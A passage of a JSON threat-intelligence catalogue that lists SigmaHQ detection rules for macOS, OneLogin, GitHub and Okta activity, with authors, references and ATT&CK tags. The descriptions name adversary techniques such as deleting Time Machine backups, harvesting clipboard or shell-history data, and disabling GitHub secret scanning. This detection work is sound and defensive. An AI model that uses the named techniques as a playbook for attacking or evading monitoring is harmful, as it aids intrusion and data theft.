"dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3b2c1059-ae5f-40b6-b5d4-6106d3ac20fe", "value": "Hidden Flag Set On File/Directory Via Chflags - MacOS" }, { "description": "Detects deletion of local audit logs", "meta": { "author": "remotephone, oscd.community", "creation_date": "2020-10-11", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_macos_clear_system_logs.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.002" ] }, "related": [ { "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", "value": "Indicator Removal on Host - Clear Mac System Logs" }, { "description": "Detects deletion attempts of MacOS Time Machine backups via the native backup utility \"tmutil\".\nAn adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.\n", "meta": { "author": "Pratinav Chandra", "creation_date": "2024-05-29", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_tmutil_delete_backup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine", "https://www.loobins.io/binaries/tmutil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "452df256-da78-427a-866f-49fa04417d74", "value": "Time Machine Backup Deletion Attempt Via Tmutil - MacOS" }, { "description": "Detects possible collection of data from the clipboard via execution of the osascript binary", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-01-31", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_macos_clipboard_data_via_osascript.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clipboard_data_via_osascript.yml" ], "tags": [ "attack.collection", "attack.execution", "attack.t1115", "attack.t1059.002" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "37b11151-1776-4f8f-b328-30939fbf2ceb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7794fa3c-edea-4cff-bec7-267dd4770fd7", "value": "Clipboard Data Collection Via OSAScript" }, { "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_security_software_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", "value": "Security Software Discovery - MacOs" }, { "description": "Detects commandline operations on shell history files", "meta": { "author": "Mikhail Larin, oscd.community", "creation_date": "2020-10-17", "falsepositive": [ "Legitimate administrative activity", "Legitimate software, cleaning hist file" ], "filename": "proc_creation_macos_susp_histfile_operations.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" ], "tags": [ "attack.credential-access", "attack.t1552.003" ] }, "related": [ { "dest-uuid": "8187bd2a-866f-4457-9009-86b0ddedffa3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "508a9374-ad52-4789-b568-fc358def2c65", "value": "Suspicious History File Operations" }, { "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", "meta": { "author": "remotephone", "creation_date": "2021-11-20", "falsepositive": [ "Mistyped commands or legitimate binaries named to match the pattern" ], "filename": "proc_creation_macos_space_after_filename.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.006" ] }, "related": [ { "dest-uuid": "e51137a5-1cdc-499e-911a-abaedaa5ac86", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", "value": "Space After Filename - macOS" }, { "description": "Detects usage of system utilities to discover files and directories", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_macos_file_and_directory_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", "value": "File and Directory Discovery - MacOS" }, { "description": "Detects the addition of a new file or path exclusion to MacOS Time Machine via the \"tmutil\" utility.\nAn adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.\n", "meta": { "author": "Pratinav Chandra", "creation_date": "2024-05-29", "falsepositive": [ "Legitimate administrator activity" ], "filename": "proc_creation_macos_tmutil_exclude_file_from_backup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine", "https://www.loobins.io/binaries/tmutil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9acf45ed-3a26-4062-bf08-56857613eb52", "value": "New File Exclusion Added To Time Machine Via Tmutil - MacOS" }, { "description": "Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility", "meta": { "author": "Sohan G (D4rkCiph3r)", "creation_date": "2023-02-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_macos_persistence_via_plistbuddy.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ "https://redcanary.com/blog/clipping-silver-sparrows-wings/", "https://www.manpagez.com/man/8/PlistBuddy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml" ], "tags": [ "attack.persistence", "attack.t1543.001", "attack.t1543.004" ] }, "related": [ { "dest-uuid": "d10cbd34-42e3-45c0-84d2-535a09849584", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "573ad264-1371-4ae0-8482-d2673b719dba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65d506d3-fcfe-4071-b4b2-bcefe721bbbb", "value": "Potential Persistence Via PlistBuddy" }, { "description": "Detects when an user assumed another user account.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-12", "falsepositive": [ "Unknown" ], "filename": "onelogin_assumed_another_user.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "onelogin", "refs": [ "https://developers.onelogin.com/api-docs/1/events/event-resource", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" ], "tags": [ "attack.impact" ] }, "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", "value": "OneLogin User Assumed Another User" }, { "description": "Detects when an user account is locked or suspended.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-12", "falsepositive": [ "System may lock or suspend user accounts." ], "filename": "onelogin_user_account_locked.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "onelogin", "refs": [ "https://developers.onelogin.com/api-docs/1/events/event-resource/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" ], "tags": [ "attack.impact" ] }, "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", "value": "OneLogin User Account Locked" }, { "description": "Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-03-07", "falsepositive": [ "Allowed administrative activities." ], "filename": "github_push_protection_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://thehackernews.com/2024/03/github-rolls-out-default-secret.html", "https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_push_protection_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ccd55945-badd-4bae-936b-823a735d37dd", "value": "Github Push Protection Disabled" }, { "description": "Detects when a new member is added or invited to a github organization.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-29", "falsepositive": [ "Organization approved new members" ], "filename": "github_new_org_member.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_new_org_member.yml" ], "tags": [ "attack.persistence", "attack.t1136.003" ] }, "related": [ { "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3908d64a-3c06-4091-b503-b3a94424533b", "value": "New Github Organization Member Added" }, { "description": "Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts.\nThis rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-27", "falsepositive": [ "Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes." ], "filename": "github_disabled_outdated_dependency_or_vulnerability.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disabled_outdated_dependency_or_vulnerability.yml" ], "tags": [ "attack.initial-access", "attack.t1195.001" ] }, "related": [ { "dest-uuid": "191cc6af-1bb2-4344-ab5f-28e496638720", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34e1c7d4-0cd5-419d-9f1b-1dad3f61018d", "value": "Outdated Dependency Or Vulnerability Alert Disabled" }, { "description": "Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).\n", "meta": { "author": "Romain Gaillard (@romain-gaillard)", "creation_date": "2024-07-29", "falsepositive": [ "Allowed administrative activities." ], "filename": "github_fork_private_repos_enabled_or_cleared.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_fork_private_repos_enabled_or_cleared.yml" ], "tags": [ "attack.persistence", "attack.t1020", "attack.t1537" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69b3bd1e-b38a-462f-9a23-fbdbf63d2294", "value": "Github Fork Private Repositories Setting Enabled/Cleared" }, { "description": "Detects when a user disables a critical security feature for an organization.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-29", "falsepositive": [ "Approved administrator/owner activities." ], "filename": "github_disable_high_risk_configuration.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise", "https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization", "https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disable_high_risk_configuration.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.persistence", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8622c92d-c00e-463c-b09d-fd06166f6794", "value": "Github High Risk Configuration Disabled" }, { "description": "Detects if the secret scanning feature is disabled for an enterprise or repository.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-03-07", "falsepositive": [ "Allowed administrative activities." ], "filename": "github_secret_scanning_feature_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_secret_scanning_feature_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3883d9a0-fd0f-440f-afbb-445a2a799bb8", "value": "Github Secret Scanning Feature Disabled" }, { "description": "Detects when a repository or an organization is being transferred to another location.", "meta": { "author": "Romain Gaillard (@romain-gaillard)", "creation_date": "2024-07-29", "falsepositive": [ "Allowed administrative activities." ], "filename": "github_repo_or_org_transferred.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration", "https://docs.github.com/en/migrations", "https://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership", "https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_repo_or_org_transferred.yml" ], "tags": [ "attack.persistence", "attack.t1020", "attack.t1537" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "04ad83ef-1a37-4c10-b57a-81092164bf33", "value": "Github Repository/Organization Transferred" }, { "description": "Detects delete action in the Github audit logs for codespaces, environment, project and repo.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-19", "falsepositive": [ "Validate the deletion activity is permitted. The \"actor\" field need to be validated." ], "filename": "github_delete_action_invoked.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_delete_action_invoked.yml" ], "tags": [ "attack.impact", "attack.collection", "attack.t1213.003" ] }, "related": [ { "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16a71777-0b2e-4db7-9888-9d59cb75200b", "value": "Github Delete Action Invoked" }, { "description": "Detects when a user creates action secret for the organization, environment, codespaces or repository.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-20", "falsepositive": [ "This detection cloud be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the \"actor\"." ], "filename": "github_new_secret_created.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_new_secret_created.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f9405037-bc97-4eb7-baba-167dad399b83", "value": "Github New Secret Created" }, { "description": "Detects when changes are made to the SSH certificate configuration of the organization.", "meta": { "author": "Romain Gaillard (@romain-gaillard)", "creation_date": "2024-07-29", "falsepositive": [ "Allowed administrative activities." ], "filename": "github_ssh_certificate_config_changed.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority", "https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_ssh_certificate_config_changed.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f575940-d85e-4ddc-af13-17dad6f1a0ef", "value": "Github SSH Certificate Configuration Changed" }, { "description": "Detects when a user bypasses the push protection on a secret detected by secret scanning.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-03-07", "falsepositive": [ "Allowed administrative activities." ], "filename": "github_push_protection_bypass_detected.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://thehackernews.com/2024/03/github-rolls-out-default-secret.html", "https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_push_protection_bypass_detected.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02cf536a-cf21-4876-8842-4159c8aee3cc", "value": "Github Push Protection Bypass Detected" }, { "description": "Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-20", "falsepositive": [ "Validate the actor if permitted to access the repo.", "Validate the Multifactor Authentication changes." ], "filename": "github_outside_collaborator_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_outside_collaborator_detected.yml" ], "tags": [ "attack.persistence", "attack.collection", "attack.t1098.001", "attack.t1098.003", "attack.t1213.003" ] }, "related": [ { "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eaa9ac35-1730-441f-9587-25767bde99d7", "value": "Github Outside Collaborator Detected" }, { "description": "A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com.\nThis rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected,\nit should be validated from GitHub UI because the log entry may not provide full context.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2023-01-27", "falsepositive": [ "Allowed self-hosted runners changes in the environment.", "A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days.", "An ephemeral self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 1 day." ], "filename": "github_self_hosted_runner_changes_detected.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "github", "refs": [ "https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners", "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_self_hosted_runner_changes_detected.yml" ], "tags": [ "attack.impact", "attack.discovery", "attack.collection", "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.initial-access", "attack.t1526", "attack.t1213.003", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8ed0e8f-7438-4b79-85eb-f358ef2fbebd", "value": "Github Self Hosted Runner Changes Detected" }, { "description": "Detects when an Policy Rule is Modified or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_policy_rule_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", "value": "Okta Policy Rule Modified or Deleted" }, { "description": "Detects when a new identity provider is created for Okta.", "meta": { "author": "kelnage", "creation_date": "2023-09-07", "falsepositive": [ "When an admin creates a new, authorised identity provider." ], "filename": "okta_identity_provider_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_identity_provider_created.yml" ], "tags": [ "attack.persistence", "attack.t1098.001" ] }, "related": [ { "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "969c7590-8c19-4797-8c1b-23155de6e7ac", "value": "Okta Identity Provider Created" }, { "description": "Detects when an the Administrator role is assigned to an user or group.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Administrator roles could be assigned to users or group by other admin users." ], "filename": "okta_admin_role_assigned_to_user_or_group.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" ], "tags": [ "attack.persistence", "attack.t1098.003" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "413d4a81-6c98-4479-9863-014785fd579c", "value": "Okta Admin Role Assigned to an User or Group" }, { "description": "Detects access to Okta admin functions through proxy.", "meta": { "author": "Muhammad Faisal @faisalusuf", "creation_date": "2023-10-25", "falsepositive": [ "False positives are expected if administrators access these function through proxy legitimatly. Apply additional filters if necessary" ], "filename": "okta_admin_activity_from_proxy_query.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/", "https://www.beyondtrust.com/blog/entry/okta-support-unit-breach", "https://dataconomy.com/2023/10/23/okta-data-breach/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_activity_from_proxy_query.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "9058ca8b-f397-4fd1-a9fa-2b7aad4d6309", "value": "Okta Admin Functions Access Through Proxy" }, { "description": "Detects new user account creation", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate and authorized user creation" ], "filename": "okta_user_created.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_created.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "b6c718dd-8f53-4b9f-98d8-93fdca966969", "value": "New Okta User Created" }, { "description": "Detects when a user has potentially entered their password into the\nusername field, which will cause the password to be retained in log files.\n", "meta": { "author": "kelnage", "creation_date": "2023-04-03", "falsepositive": [ "Unlikely" ], "filename": "okta_password_in_alternateid_field.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "okta", "refs": [ "https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data", "https://developer.okta.com/docs/reference/api/system-log/", "https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_password_in_alternateid_field.yml" ], "tags": [ "attack.credential-access", "attack.t1552" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91b76b84-8589-47aa-9605-c837583b82a9", "value": "Potential Okta Password in AlternateID Field" }, { "description": "Detects when an application is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-12", "falsepositive": [ "Unknown" ], "filename": "okta_application_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "okta", 